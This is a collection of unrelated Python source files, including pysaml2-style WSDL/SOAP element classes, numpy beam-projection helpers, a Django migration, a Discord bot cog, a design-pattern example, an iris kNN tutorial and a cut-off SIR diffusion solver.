    # NOTE(review): the type "None" for wsdl:required is a literal string in
    # the generated output — presumably untyped; confirm against parse_xsd.py.
    c_attributes["{http://schemas.xmlsoap.org/wsdl/}required"] = ("required", "None", False)
    c_attributes["parts"] = ("parts", "NMTOKENS", False)
    c_attributes["encodingStyle"] = ("encoding_style", EncodingStyle_, False)
    c_attributes["use"] = ("use", UseChoice_, False)
    c_attributes["namespace"] = ("namespace", "anyURI", False)

    def __init__(
        self,
        required=None,
        parts=None,
        encoding_style=None,
        use=None,
        namespace=None,
        text=None,
        extension_elements=None,
        extension_attributes=None,
    ):
        SamlBase.__init__(
            self,
            text=text,
            extension_elements=extension_elements,
            extension_attributes=extension_attributes,
        )
        self.required = required
        self.parts = parts
        self.encoding_style = encoding_style
        self.use = use
        self.namespace = namespace
class TFault_(TFaultRes_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:tFault element"""

    c_tag = "tFault"
    c_namespace = NAMESPACE
    c_children = TFaultRes_.c_children.copy()
    c_attributes = TFaultRes_.c_attributes.copy()
    c_child_order = TFaultRes_.c_child_order[:]
    c_cardinality = TFaultRes_.c_cardinality.copy()
    # Extends TFaultRes_ with a mandatory fault name.
    c_attributes["name"] = ("name", "NCName", True)

    def __init__(
        self,
        name=None,
        required=None,
        parts=None,
        encoding_style=None,
        use=None,
        namespace=None,
        text=None,
        extension_elements=None,
        extension_attributes=None,
    ):
        TFaultRes_.__init__(
            self,
            required=required,
            parts=parts,
            encoding_style=encoding_style,
            use=use,
            namespace=namespace,
            text=text,
            extension_elements=extension_elements,
            extension_attributes=extension_attributes,
        )
        self.name = name
def t_fault__from_string(xml_string):
    """Parse *xml_string* into a TFault_ instance."""
    return saml2.create_class_from_xml_string(TFault_, xml_string)
class THeaderFault_(SamlBase):
    """The http://schemas.xmlsoap.org/wsdl/soap/:tHeaderFault element"""

    c_tag = "tHeaderFault"
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    # XML attribute name -> (python attribute name, type, required);
    # message, part and use are mandatory per the schema.
    c_attributes["message"] = ("message", "QName", True)
    c_attributes["part"] = ("part", "NMTOKEN", True)
    c_attributes["use"] = ("use", UseChoice_, True)
    c_attributes["encodingStyle"] = ("encoding_style", EncodingStyle_, False)
    c_attributes["namespace"] = ("namespace", "anyURI", False)

    def __init__(
        self,
        message=None,
        part=None,
        use=None,
        encoding_style=None,
        namespace=None,
        text=None,
        extension_elements=None,
        extension_attributes=None,
    ):
        SamlBase.__init__(
            self,
            text=text,
            extension_elements=extension_elements,
            extension_attributes=extension_attributes,
        )
        self.message = message
        self.part = part
        self.use = use
        self.encoding_style = encoding_style
        self.namespace = namespace
def t_header_fault__from_string(xml_string):
    """Parse *xml_string* into a THeaderFault_ instance."""
    return saml2.create_class_from_xml_string(THeaderFault_, xml_string)
class TAddress_(wsdl.TExtensibilityElement_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:tAddress element"""

    c_tag = "tAddress"
    c_namespace = NAMESPACE
    c_children = wsdl.TExtensibilityElement_.c_children.copy()
    c_attributes = wsdl.TExtensibilityElement_.c_attributes.copy()
    c_child_order = wsdl.TExtensibilityElement_.c_child_order[:]
    c_cardinality = wsdl.TExtensibilityElement_.c_cardinality.copy()
    # The endpoint URI; mandatory per the schema.
    c_attributes["location"] = ("location", "anyURI", True)

    def __init__(
        self,
        location=None,
        required=None,
        text=None,
        extension_elements=None,
        extension_attributes=None,
    ):
        wsdl.TExtensibilityElement_.__init__(
            self,
            required=required,
            text=text,
            extension_elements=extension_elements,
            extension_attributes=extension_attributes,
        )
        self.location = location
def t_address__from_string(xml_string):
    """Parse *xml_string* into a TAddress_ instance."""
    return saml2.create_class_from_xml_string(TAddress_, xml_string)
class TBinding_(wsdl.TExtensibilityElement_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:tBinding element"""

    c_tag = "tBinding"
    c_namespace = NAMESPACE
    c_children = wsdl.TExtensibilityElement_.c_children.copy()
    c_attributes = wsdl.TExtensibilityElement_.c_attributes.copy()
    c_child_order = wsdl.TExtensibilityElement_.c_child_order[:]
    c_cardinality = wsdl.TExtensibilityElement_.c_cardinality.copy()
    # transport URI is mandatory; style defaults are handled by consumers.
    c_attributes["transport"] = ("transport", "anyURI", True)
    c_attributes["style"] = ("style", TStyleChoice_, False)

    def __init__(
        self,
        transport=None,
        style=None,
        required=None,
        text=None,
        extension_elements=None,
        extension_attributes=None,
    ):
        wsdl.TExtensibilityElement_.__init__(
            self,
            required=required,
            text=text,
            extension_elements=extension_elements,
            extension_attributes=extension_attributes,
        )
        self.transport = transport
        self.style = style
def t_binding__from_string(xml_string):
    """Parse *xml_string* into a TBinding_ instance."""
    return saml2.create_class_from_xml_string(TBinding_, xml_string)
class Operation(TOperation_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:operation element"""

    # Concrete element class; behavior is inherited unchanged from TOperation_.
    c_tag = "operation"
    c_namespace = NAMESPACE
    c_children = TOperation_.c_children.copy()
    c_attributes = TOperation_.c_attributes.copy()
    c_child_order = TOperation_.c_child_order[:]
    c_cardinality = TOperation_.c_cardinality.copy()
def operation_from_string(xml_string):
    """Parse *xml_string* into an Operation instance."""
    return saml2.create_class_from_xml_string(Operation, xml_string)
class TBody_(wsdl.TExtensibilityElement_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:tBody element"""

    c_tag = "tBody"
    c_namespace = NAMESPACE
    c_children = wsdl.TExtensibilityElement_.c_children.copy()
    c_attributes = wsdl.TExtensibilityElement_.c_attributes.copy()
    c_child_order = wsdl.TExtensibilityElement_.c_child_order[:]
    c_cardinality = wsdl.TExtensibilityElement_.c_cardinality.copy()
    # XML attribute name -> (python attribute name, type, required)
    c_attributes["parts"] = ("parts", "NMTOKENS", False)
    c_attributes["encodingStyle"] = ("encoding_style", EncodingStyle_, False)
    c_attributes["use"] = ("use", UseChoice_, False)
    c_attributes["namespace"] = ("namespace", "anyURI", False)

    def __init__(
        self,
        parts=None,
        encoding_style=None,
        use=None,
        namespace=None,
        required=None,
        text=None,
        extension_elements=None,
        extension_attributes=None,
    ):
        wsdl.TExtensibilityElement_.__init__(
            self,
            required=required,
            text=text,
            extension_elements=extension_elements,
            extension_attributes=extension_attributes,
        )
        self.parts = parts
        self.encoding_style = encoding_style
        self.use = use
        self.namespace = namespace
def t_body__from_string(xml_string):
    """Parse *xml_string* into a TBody_ instance."""
    instance = saml2.create_class_from_xml_string(TBody_, xml_string)
    return instance
class Fault(TFault_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:fault element."""

    c_tag = "fault"
    c_namespace = NAMESPACE
    # Copy the base class schema tables so they can be extended safely.
    c_children = dict(TFault_.c_children)
    c_attributes = dict(TFault_.c_attributes)
    c_child_order = list(TFault_.c_child_order)
    c_cardinality = dict(TFault_.c_cardinality)
def fault_from_string(xml_string):
    """Parse *xml_string* into a Fault instance."""
    instance = saml2.create_class_from_xml_string(Fault, xml_string)
    return instance
class Headerfault(THeaderFault_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:headerfault element."""

    c_tag = "headerfault"
    c_namespace = NAMESPACE
    # Copy the base class schema tables so they can be extended safely.
    c_children = dict(THeaderFault_.c_children)
    c_attributes = dict(THeaderFault_.c_attributes)
    c_child_order = list(THeaderFault_.c_child_order)
    c_cardinality = dict(THeaderFault_.c_cardinality)
def headerfault_from_string(xml_string):
    """Parse *xml_string* into a Headerfault instance."""
    instance = saml2.create_class_from_xml_string(Headerfault, xml_string)
    return instance
class Address(TAddress_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:address element."""

    c_tag = "address"
    c_namespace = NAMESPACE
    # Copy the base class schema tables so they can be extended safely.
    c_children = dict(TAddress_.c_children)
    c_attributes = dict(TAddress_.c_attributes)
    c_child_order = list(TAddress_.c_child_order)
    c_cardinality = dict(TAddress_.c_cardinality)
def address_from_string(xml_string):
    """Parse *xml_string* into an Address instance."""
    instance = saml2.create_class_from_xml_string(Address, xml_string)
    return instance
class Binding(TBinding_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:binding element."""

    c_tag = "binding"
    c_namespace = NAMESPACE
    # Copy the base class schema tables so they can be extended safely.
    c_children = dict(TBinding_.c_children)
    c_attributes = dict(TBinding_.c_attributes)
    c_child_order = list(TBinding_.c_child_order)
    c_cardinality = dict(TBinding_.c_cardinality)
def binding_from_string(xml_string):
    """Parse *xml_string* into a Binding instance."""
    instance = saml2.create_class_from_xml_string(Binding, xml_string)
    return instance
class Body(TBody_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:body element."""

    c_tag = "body"
    c_namespace = NAMESPACE
    # Copy the base class schema tables so they can be extended safely.
    c_children = dict(TBody_.c_children)
    c_attributes = dict(TBody_.c_attributes)
    c_child_order = list(TBody_.c_child_order)
    c_cardinality = dict(TBody_.c_cardinality)
def body_from_string(xml_string):
    """Parse *xml_string* into a Body instance."""
    instance = saml2.create_class_from_xml_string(Body, xml_string)
    return instance
class THeader_(wsdl.TExtensibilityElement_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:tHeader element."""

    c_tag = "tHeader"
    c_namespace = NAMESPACE
    c_children = dict(wsdl.TExtensibilityElement_.c_children)
    c_attributes = dict(wsdl.TExtensibilityElement_.c_attributes)
    c_child_order = list(wsdl.TExtensibilityElement_.c_child_order)
    c_cardinality = dict(wsdl.TExtensibilityElement_.c_cardinality)
    # Child elements and XML attributes declared by this type.
    c_children["{http://schemas.xmlsoap.org/wsdl/soap/}headerfault"] = ("headerfault", [Headerfault])
    c_cardinality["headerfault"] = {"min": 0}
    c_attributes["message"] = ("message", "QName", True)
    c_attributes["part"] = ("part", "NMTOKEN", True)
    c_attributes["use"] = ("use", UseChoice_, True)
    c_attributes["encodingStyle"] = ("encoding_style", EncodingStyle_, False)
    c_attributes["namespace"] = ("namespace", "anyURI", False)
    c_child_order.extend(["headerfault"])

    def __init__(self, headerfault=None, message=None, part=None, use=None,
                 encoding_style=None, namespace=None, required=None,
                 text=None, extension_elements=None,
                 extension_attributes=None):
        """Store soap:header attributes after initialising the base element."""
        wsdl.TExtensibilityElement_.__init__(
            self,
            required=required,
            text=text,
            extension_elements=extension_elements,
            extension_attributes=extension_attributes,
        )
        # Fall back to a fresh list so instances never share a default.
        self.headerfault = headerfault or []
        self.message = message
        self.part = part
        self.use = use
        self.encoding_style = encoding_style
        self.namespace = namespace
def t_header__from_string(xml_string):
    """Parse *xml_string* into a THeader_ instance."""
    instance = saml2.create_class_from_xml_string(THeader_, xml_string)
    return instance
class Header(THeader_):
    """The http://schemas.xmlsoap.org/wsdl/soap/:header element."""

    c_tag = "header"
    c_namespace = NAMESPACE
    # Copy the base class schema tables so they can be extended safely.
    c_children = dict(THeader_.c_children)
    c_attributes = dict(THeader_.c_attributes)
    c_child_order = list(THeader_.c_child_order)
    c_cardinality = dict(THeader_.c_cardinality)
def header_from_string(xml_string):
    """Parse *xml_string* into a Header instance."""
    instance = saml2.create_class_from_xml_string(Header, xml_string)
    return instance
# Attribute groups from the WSDL/SOAP schema:
# (attribute name, type, required) tuples shared by body-like elements.
AG_tBodyAttributes = [
    ("encodingStyle", EncodingStyle_, False),
    ("use", UseChoice_, False),
    ("namespace", "anyURI", False),
]
# Attributes shared by header-like elements.
AG_tHeaderAttributes = [
    ("message", "QName", True),
    ("part", "NMTOKEN", True),
    ("use", UseChoice_, True),
    ("encodingStyle", EncodingStyle_, False),
    ("namespace", "anyURI", False),
]
# Maps an element's c_tag to the parser that builds it from an XML string.
ELEMENT_FROM_STRING = {
    EncodingStyle_.c_tag: encoding_style__from_string,
    Binding.c_tag: binding_from_string,
    TBinding_.c_tag: t_binding__from_string,
    TStyleChoice_.c_tag: t_style_choice__from_string,
    Operation.c_tag: operation_from_string,
    TOperation_.c_tag: t_operation__from_string,
    Body.c_tag: body_from_string,
    TBody_.c_tag: t_body__from_string,
    UseChoice_.c_tag: use_choice__from_string,
    Fault.c_tag: fault_from_string,
    TFault_.c_tag: t_fault__from_string,
    Header.c_tag: header_from_string,
    THeader_.c_tag: t_header__from_string,
    Headerfault.c_tag: headerfault_from_string,
    THeaderFault_.c_tag: t_header_fault__from_string,
    Address.c_tag: address_from_string,
    TAddress_.c_tag: t_address__from_string,
}
# Maps a tag name to its element class; used by factory() below.
ELEMENT_BY_TAG = {
    "encodingStyle": EncodingStyle_,
    "binding": Binding,
    "tBinding": TBinding_,
    "tStyleChoice": TStyleChoice_,
    "operation": Operation,
    "tOperation": TOperation_,
    "body": Body,
    "tBody": TBody_,
    "useChoice": UseChoice_,
    "fault": Fault,
    "tFault": TFault_,
    "header": Header,
    "tHeader": THeader_,
    "headerfault": Headerfault,
    "tHeaderFault": THeaderFault_,
    "address": Address,
    "tAddress": TAddress_,
    "tFaultRes": TFaultRes_,
}
def factory(tag, **kwargs):
    """Instantiate the element class registered for *tag*.

    Raises KeyError for an unknown tag.
    """
    cls = ELEMENT_BY_TAG[tag]
    return cls(**kwargs)
|
import numpy as np
def _unit_vector(data, axis=None, out=None):
    """ Return ndarray normalized by length, i.e. Euclidean norm, along axis.
    >>> v0 = np.random.random(3)
    >>> v1 = _unit_vector(v0)
    >>> np.allclose(v1, v0 / np.linalg.norm(v0))
    True
    >>> v0 = np.random.rand(5, 4, 3)
    >>> v1 = _unit_vector(v0, axis=-1)
    >>> v2 = v0 / np.expand_dims(np.sqrt(np.sum(v0*v0, axis=2)), 2)
    >>> np.allclose(v1, v2)
    True
    >>> v1 = _unit_vector(v0, axis=1)
    >>> v2 = v0 / np.expand_dims(np.sqrt(np.sum(v0*v0, axis=1)), 1)
    >>> np.allclose(v1, v2)
    True
    >>> v1 = np.empty((5, 4, 3))
    >>> _unit_vector(v0, axis=1, out=v1)
    >>> np.allclose(v1, v2)
    True
    >>> list(_unit_vector([]))
    []
    >>> list(_unit_vector([1]))
    [1.0]
    """
    if out is None:
        data = np.array(data, dtype=np.float64, copy=True)
        if data.ndim == 1:
            # Fast path for a plain vector: divide by its Euclidean norm.
            data /= np.sqrt(np.dot(data, data))
            return data
    else:
        # Write the result into the caller-supplied buffer.
        if out is not data:
            out[:] = np.array(data, copy=False)
        data = out
    # General case: squared lengths along `axis` (all axes when axis is None).
    length = np.atleast_1d(np.sum(data * data, axis))
    np.sqrt(length, length)  # in-place square root
    if axis is not None:
        # Reinsert the reduced axis so the division broadcasts correctly.
        length = np.expand_dims(length, axis)
    data /= length
    if out is None:
        return data
    # NOTE: when `out` is given, the function intentionally returns None;
    # the normalized data lives in `out`.
def rotation_matrix(th):
    """
    :param th: vector of radians for rotation in x, y, z axis respectively
    :return: 3x3 rotation matrix
    """
    # Precompute the (negated-angle) sines/cosines once per axis.
    cx, sx = np.cos(-th[0]), np.sin(-th[0])
    cy, sy = np.cos(-th[1]), np.sin(-th[1])
    cz, sz = np.cos(-th[2]), np.sin(-th[2])
    rx = np.array([[1., 0., 0.],
                   [0., cx, -sx],
                   [0., sx, cx]])
    ry = np.array([[cy, 0., sy],
                   [0., 1., 0.],
                   [-sy, 0., cy]])
    rz = np.array([[cz, -sz, 0.],
                   [sz, cz, 0.],
                   [0., 0., 1.]])
    # Compose in the same order as the original: Rx . (Ry . Rz).
    return np.dot(rx, np.dot(ry, rz))
def _projection_matrix(point, normal, direction=None,
                       perspective=None, pseudo=False):
    """Return matrix to project onto plane defined by point and normal.
    Using either perspective point, projection direction, or none of both.
    If pseudo is True, perspective projections will preserve relative depth
    such that Perspective = dot(Orthogonal, PseudoPerspective).
    >>> P = _projection_matrix([0, 0, 0], [1, 0, 0])
    >>> np.allclose(P[1:, 1:], np.identity(4)[1:, 1:])
    True
    >>> point = np.random.random(3) - 0.5
    >>> normal = np.random.random(3) - 0.5
    >>> direct = np.random.random(3) - 0.5
    >>> persp = np.random.random(3) - 0.5
    >>> P0 = _projection_matrix(point, normal)
    >>> P1 = _projection_matrix(point, normal, direction=direct)
    >>> P2 = _projection_matrix(point, normal, perspective=persp)
    >>> P3 = _projection_matrix(point, normal, perspective=persp, pseudo=True)
    >>> P = _projection_matrix([3, 0, 0], [1, 1, 0], [1, 0, 0])
    >>> v0 = (np.random.rand(4, 5) - 0.5) * 20
    >>> v0[3] = 1
    >>> v1 = np.dot(P, v0)
    >>> np.allclose(v1[1], v0[1])
    True
    >>> np.allclose(v1[0], 3-v1[1])
    True
    """
    # Work on a 4x4 homogeneous matrix; only the first three components of
    # point/normal/direction/perspective are used.
    M = np.identity(4)
    point = np.array(point[:3], dtype=np.float64, copy=False)
    normal = _unit_vector(normal[:3])
    if perspective is not None:
        # perspective projection
        perspective = np.array(perspective[:3], dtype=np.float64,
                               copy=False)
        M[0, 0] = M[1, 1] = M[2, 2] = np.dot(perspective - point, normal)
        M[:3, :3] -= np.outer(perspective, normal)
        if pseudo:
            # preserve relative depth
            M[:3, :3] -= np.outer(normal, normal)
            M[:3, 3] = np.dot(point, normal) * (perspective + normal)
        else:
            M[:3, 3] = np.dot(point, normal) * perspective
        # The last row makes the homogeneous coordinate encode depth.
        M[3, :3] = -normal
        M[3, 3] = np.dot(perspective, normal)
    elif direction is not None:
        # parallel projection
        direction = np.array(direction[:3], dtype=np.float64, copy=False)
        # NOTE(review): scale is zero when direction is parallel to the
        # plane, which would divide by zero below — confirm callers avoid it.
        scale = np.dot(direction, normal)
        M[:3, :3] -= np.outer(direction, normal) / scale
        M[:3, 3] = direction * (np.dot(point, normal) / scale)
    else:
        # orthogonal projection
        M[:3, :3] -= np.outer(normal, normal)
        M[:3, 3] = np.dot(point, normal) * normal
    return M
def proj_iso_plane(pts, sad, gantry_deg, collimator_deg=90.0):
    # pts = pts.copy()
    """Project points onto the y=0 plane as seen from a rotated beam source.

    sad: source to axis distance (source sits at [0, -sad, 0])
    gantry_deg: gantry rotation angle in degrees
    collimator_deg: collimator rotation angle in degrees
    pts: point or matrix of column vectors (3 x N)

    Returns a 3 x N array with the homogeneous coordinate divided out.
    """
    # Rotation: no x rotation; collimator about y, gantry about z (radians).
    rot = [0.0, np.radians(collimator_deg), np.radians(gantry_deg)]
    src = [0, -sad, 0]
    pts_r = np.dot(rotation_matrix(rot), pts)
    # Append a homogeneous row of ones so the 4x4 projection can be applied.
    pts_r = np.vstack((pts_r, np.ones(pts_r.shape[1])))
    pts_r = np.dot(_projection_matrix([0., 0., 0.], [0., 1., 0.], perspective=src), pts_r)
    # De-homogenize: divide x,y,z by the w row.
    pts_r = np.divide(pts_r[:3], pts_r[3])
    return pts_r
|
# Integer bounds and data file names used by this module's consumers.
MAX_64_INT = 9223372036854775807  # 2**63 - 1, the largest signed 64-bit int
# NOTE(review): 2**32 - 1 is the max *unsigned* 32-bit value; the name
# parallels MAX_64_INT (signed) — confirm which bound is intended.
MAX_32_INT = 2**32-1
GROUND_FILE_NAME = "ground_truth.txt"
UNIVERSE_FILE_NAME = "universe.txt"
WHITES_FILE_NAME = "whites_example.txt"
|
# Generated by Django 3.1.1 on 2020-09-08 20:06
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add Soldier.address and make several Soldier text fields nullable."""

    dependencies = [
        ('soldiers_viewer', '0006_auto_20200907_2012'),
    ]

    operations = [
        # New optional address column.
        migrations.AddField(
            model_name='soldier',
            name='address',
            field=models.CharField(max_length=100, null=True),
        ),
        # Relax existing fields to allow NULL values.
        migrations.AlterField(
            model_name='soldier',
            name='regiment',
            field=models.CharField(max_length=50, null=True),
        ),
        migrations.AlterField(
            model_name='soldier',
            name='soldier_number',
            field=models.CharField(max_length=20, null=True),
        ),
        migrations.AlterField(
            model_name='soldier',
            name='soldier_rank',
            field=models.CharField(max_length=20, null=True),
        ),
    ]
|
import discord
import random
import json
from discord.ext import commands
class Commands(commands.Cog):
    """Cog exposing a command that posts a random stored media link."""

    def __init__(self, client):
        self.client = client
        # Recently sent entries, kept to avoid immediate repeats.
        self.limited = []
        # Number of re-draws performed so far; history resets at 30.
        self.count = 0

    @commands.command()
    async def random(self, ctx):
        """Send a random entry from elements.json, avoiding recent repeats."""
        with open('./model/utils/elements.json', 'r') as jsonFile:
            data = json.load(jsonFile)
        if len(data) == 0:
            await ctx.channel.send("No Images or Videos found!")
            return
        image = random.choice(data)
        # Re-draw while the pick was sent recently; after 30 cumulative
        # re-draws the history is cleared so the loop cannot spin forever.
        while image in self.limited:
            self.count += 1
            if self.count == 30:
                self.limited = []
                self.count = 0
            image = random.choice(data)
        self.limited.append(image)
        await ctx.channel.send(image)
#Setup
def setup(client):
    """Entry point for discord.py's load_extension: register the cog."""
    client.add_cog(Commands(client))
|
"""
*What is this pattern about?
In Java and other languages, the Abstract Factory Pattern serves to provide an interface for
creating related/dependent objects without need to specify their
actual class.
The idea is to abstract the creation of objects depending on business
logic, platform choice, etc.
In Python, the interface we use is simply a callable, which is a "builtin"
interface in Python, and in normal circumstances we can simply use the class
itself as that callable, because classes are first-class objects in Python.
*What does this example do?
This particular implementation abstracts the creation of a pet and
does so depending on the factory we chose (Dog or Cat, or random_animal)
This works because both Dog/Cat and random_animal respect a common
interface (callable for creation and .speak()).
Now my application can create pets abstractly and decide later,
based on my own criteria, dogs over cats.
*Where is the pattern used practically?
*References:
https://sourcemaking.com/design_patterns/abstract_factory
http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/
*TL;DR
Provides a way to encapsulate a group of individual factories.
"""
class StatsShop:
    """A Stats shop"""

    def __init__(self, stats_factory=None):
        """stat_factory is our abstract factory. We can set it at will."""
        self.sport_factory = stats_factory

    def show_sport(self):
        """Instantiate a stats provider via the factory and query its URL.

        NOTE(review): the product must expose base_url(); RotoWire (used in
        main) does not define it, so this raises AttributeError — confirm.
        """
        sport = self.sport_factory()
        # print("We have a lovely {}".format(pet))
        sport.base_url()
class RotoWire:
    """Stats provider stub for RotoWire.

    NOTE(review): unlike FantasyPros, this class defines no base_url(),
    so StatsShop.show_sport() fails when configured with RotoWire.
    """

    def __str__(self):
        return "Rotowire"

    def get_data(self):
        # Not implemented yet.
        pass
class FantasyPros:
    """Stats provider for FantasyPros NFL projection pages."""

    def __str__(self):
        return "FantasyPros"

    def base_url(self):
        """Return the address of the NFL projections page."""
        return 'www.fantasypros.com/nfl/projections/'
# Additional factories:
# Create a random animal
def random_animal():
    """Let's be dynamic!

    NOTE(review): `random`, `Dog` and `Cat` are not defined or imported in
    this module, so calling this raises NameError — leftover from the
    original pet-shop example this file was adapted from.
    """
    return random.choice([Dog, Cat])()
# Show stats providers with various factories
def main():
    """Demonstrate the abstract-factory pattern with stats providers.

    The shop is configured with a factory (here the RotoWire class itself)
    and creates/uses providers through it without naming the concrete class.

    The classic pet-shop variant of this example looked like::

        shop = PetShop(random_animal)
        for i in range(3):
            shop.show_pet()
            print("=" * 20)

    (PetShop / show_pet do not exist in this module, so the example is kept
    as illustration only, not as a doctest.)
    """
    # Bug fix: the example lines above previously sat *outside* the
    # docstring as bare ">>>" statements, which made this module a
    # SyntaxError; they are now part of the docstring.
    rotowire_stats = StatsShop(RotoWire)
    rotowire_stats.show_sport()
if __name__ == "__main__":
    # Bug fix: `random` is used below but was never imported anywhere in
    # this module, so the guard raised NameError.
    import random

    random.seed(1234)  # for deterministic doctest outputs
    import doctest

    doctest.testmod()
|
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
import pandas as pd
from sklearn.neighbors import KNeighborsClassifier
import numpy as np
# Load the iris data set and fit a 1-nearest-neighbour classifier once at
# import time; the helper functions below report on these module globals.
iris_dataset = load_iris()
X_train, X_test, y_train, y_test = train_test_split(iris_dataset['data'], iris_dataset['target'], random_state=0)
knn=KNeighborsClassifier(n_neighbors=1)
knn.fit(X_train,y_train)
# A single unseen flower measurement to classify.
X_new =np.array([[5,2.9,1,0.2]])
prediction=knn.predict(X_new)
y_pre=knn.predict(X_test)
def acquaintance_data():
    """Print an overview (keys, names, first rows) of the iris data set."""
    # Bug fix: the printed labels previously read "isir_dataset" (typo).
    print("Keys of iris_dataset:\n{}".format(iris_dataset.keys()) + "\n\n.........")
    print("Target names of iris_dataset:\n{}".format(iris_dataset['target_names']) + "\n\n.........")
    print("Feature names of iris_dataset:\n{}".format(iris_dataset['feature_names']) + "\n\n.........")
    print("Data of iris_dataset:\n{}".format(iris_dataset['data'][:5]) + "\n\n.........")
    print("Target of iris_dataset:\n{}".format(iris_dataset['target'][:5]) + "\n\n.........")
def train_test_data():
    """Print the shapes of the train/test split (module globals)."""
    print("X_train shape:{}".format(X_train.shape))
    print("X_test shape:{}".format(X_test.shape))
    print("y_train shape:{}".format(y_train.shape))
    print("y_test shape:{}".format(y_test.shape))
def scatter_plot():
    """Draw a pair-wise scatter matrix of the training features, coloured by class."""
    iris_dataframe=pd.DataFrame(X_train,columns=iris_dataset['feature_names'])
    # Bug fix: pandas.scatter_matrix was deprecated and removed (pandas
    # >= 0.25); the supported entry point is pandas.plotting.scatter_matrix.
    grr=pd.plotting.scatter_matrix(iris_dataframe,c=y_train,figsize=(15,15),marker='o',
                                   hist_kwds={'bins':20},s=60,alpha=0.8
                                   )
def main():
    """Print the kNN prediction for X_new and the accuracy on the test set."""
    print('\n')
    #print(knn.fit(X_train,y_train))
    print("Prediction :{}".format(prediction))
    print("Prediction target name:{}".format(iris_dataset['target_names'][prediction]))
    # NOTE(review): "preditions" is a typo in the output string (left as-is).
    print("Test set preditions:{}\n".format(y_pre))
    # Two equivalent accuracy computations: manual mean and knn.score.
    print("Test set score:{:.2f}".format(np.mean(y_pre==y_test)))
    print("Test set score:{:.2f}".format(knn.score(X_test,y_test)))
main()
|
import glob,os
import numpy as np
import matplotlib.pyplot as plt
from plotmaker import trav_wave
def simple_PDE(T,Nx,Nt,X,lam,beta,S_1,I_1,R_1,f,g,h):
    # Explicit (forward Euler) finite-difference solver for a 1-D SIR
    # reaction-diffusion system on [0, X] over [0, T], with ghost-cell
    # (zero-flux) boundaries. S_1/I_1/R_1 hold the previous time step and
    # are updated in place; f, g, h are source terms f(t, x) per class.
    # NOTE(review): the parameters `lam` and `beta` are shadowed by the
    # local `lam = 1` and `def beta()` below, so the caller's values are
    # ignored — confirm intent.
    S = np.zeros(Nx+3) #list of Susceptible (incl. two ghost cells)
    #S_1 = np.ones(Nx+1)#list of Susceptible in previous time step
    I = np.zeros(Nx+3) #list of Infective
    #I_1 = np.zeros(Nx+1)#list of Infective in previous time step
    R = np.zeros(Nx+3) #list of Removed
    #R_1 = np.zeros(Nx+1)#list of Removed in previous time step
    print T
    print Nt
    x = np.linspace(0,X,Nx+1)
    t = np.linspace(0,T,Nt+1)
    dt = t[1]-t[0]
    dx = x[1]-x[0]
    print "dt=",dt
    print "dx=",dx
    print "dx^2=",dx**2
    #Check travelling wave: sample the solution at a fixed position z_X.
    z = np.zeros(Nt+1)
    z_S = np.zeros(Nt+1)
    z_I = np.zeros(Nt+1)
    z_R = np.zeros(Nt+1)
    z_X = 15
    z_i = int(z_X/dx)
    def gauss(t,a,sigma,T):
        # Gaussian bump (currently only used by the commented-out initial
        # condition below).
        return a*np.exp(-0.5*(t-T)**2/sigma)
    #I_1[:] = gauss(x,0.2,0.5,0) #starts with a gauss function
    #I_1[:] += 0.1
    np.save("images/Sub%04d" % 0,S_1) #initial conditions
    np.save("images/Inf%04d" % 0,I_1) #initial conditions
    np.save("images/Rem%04d" % 0,R_1) #initial conditions
    #Initial cond for travelling wave
    """
    z[0] = z_X
    z_S[0] = S_1[z_i]
    z_I[0] = I_1[z_i]
    z_R[0] = R_1[z_i]
    """
    #print "S---------------------"
    #print S_1[1:-1]
    #def lam():
    #    return 1
    lam = 1
    def beta():
        # Loss-of-immunity rate; currently disabled (returns 0).
        return 0 # S_1[1:-1]*I_1[1:-1]/R_1[1:-1]
    #print S_1[1:-1]
    for n in range(1,Nt+1):
        # Forward Euler update of the interior points: reaction terms plus
        # a second-order central difference for the diffusion term.
        S[1:-1] = S_1[1:-1] + dt*(-S_1[1:-1]*I_1[1:-1]+beta()*R_1[1:-1]+(S_1[2:]-2*S_1[1:-1]+S_1[:-2])/dx**2+f(t[n-1],x))
        I[1:-1] = I_1[1:-1] + dt*(S_1[1:-1]*I_1[1:-1]-lam*I_1[1:-1]+(I_1[2:]-2*I_1[1:-1]+I_1[:-2])/dx**2+g(t[n-1],x))
        R[1:-1] = R_1[1:-1] + dt*(lam*I_1[1:-1]-beta()*R_1[1:-1]+(R_1[2:]-2*R_1[1:-1]+R_1[:-2])/dx**2+h(t[n-1],x))
        """
        z[n] = z_X-n*dt
        z_S[n] = S[z_i]
        z_I[n] = I[z_i]
        z_R[n] = R[z_i]
        """
        # Mirror the ghost cells to impose zero-flux boundary conditions.
        S[0] = S[2]
        S[-1] = S[-3]
        I[0] = I[2]
        I[-1] = I[-3]
        R[0] = R[2]
        R[-1] =R[-3]
        """
        if (n%40 == 0):
            np.save("images/Sub%04d" % (n/40),S)
            np.save("images/Inf%04d" % (n/40),I)
            np.save("images/Rem%04d" % (n/40),R)
        """
        # Roll the new step into the "previous" arrays (in place, so the
        # caller's arrays are mutated too).
        S_1[:] = S
        I_1[:] = I
        R_1[:] = R
    #Find area of Infective
    #classnames = ['Susceptible', 'Infective','Removed']
    #z_list = [z_S,z_I,z_R]
    #trav_wave(Nt,z,z_list,classnames,z_X,'1D')
    plotnames = ['images/Sub', 'images/Inf', 'images/Rem']
    moviename = 'plots/Travelling_wave'
    parameter_values = ['Sub','Inf','Rem']
    para_name = "Class"
    L = X
    # Return the grids and the final interior solution (ghost cells dropped).
    return t,x,S[1:-1],I[1:-1],R[1:-1]
def build_plot(plotnames,moviename,parameter_values,para_name,L,T,z_X):
    # Render every saved frame (one curve per class) to tmp*.png, mark the
